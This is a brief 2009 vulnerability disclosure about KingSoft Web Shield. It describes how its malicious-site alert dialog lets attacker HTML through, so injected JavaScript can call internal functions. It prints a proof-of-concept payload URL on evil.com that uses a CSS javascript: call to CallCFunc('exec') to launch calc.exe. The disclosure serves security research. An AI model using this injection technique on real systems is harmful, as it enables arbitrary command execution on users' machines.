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KingSoft Web Shield <= XSS/Code Execution Vulnerability
来源:www.vfcocus.net 作者:inking 发布时间:2009-05-20  

# KingSoft Web Shield XSS and Remote Code Execution Vulnerability
# Found by inking
# Version <=
# Background: KingSoft Web Shield is a popular anti-malwebsites production  of KingSoft Inc. around China.
# Details: When the KSWebShield detects a malwebsite, it sends the evil url from the web browser
# to the KSWebShield service, and popup a dialog which alerts that a malwebsite has been detected.
# Because it's unreliable filter method, the attacker can insert any HTML tag in the alert dialog.
# when the evil codes are successfully inserted, we can use javascript to call it's inner functions
# of the KSWebShield and execute any system commands.

# The evil url maybe like this

# When decoded by the KSWebShield, the url maybe like this
hxxp://evil.com/index.php?html=<p style="background:url(javascript:parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe' ))">test</p>

# Just make a website with evil javascript codes, and browse the url shows above

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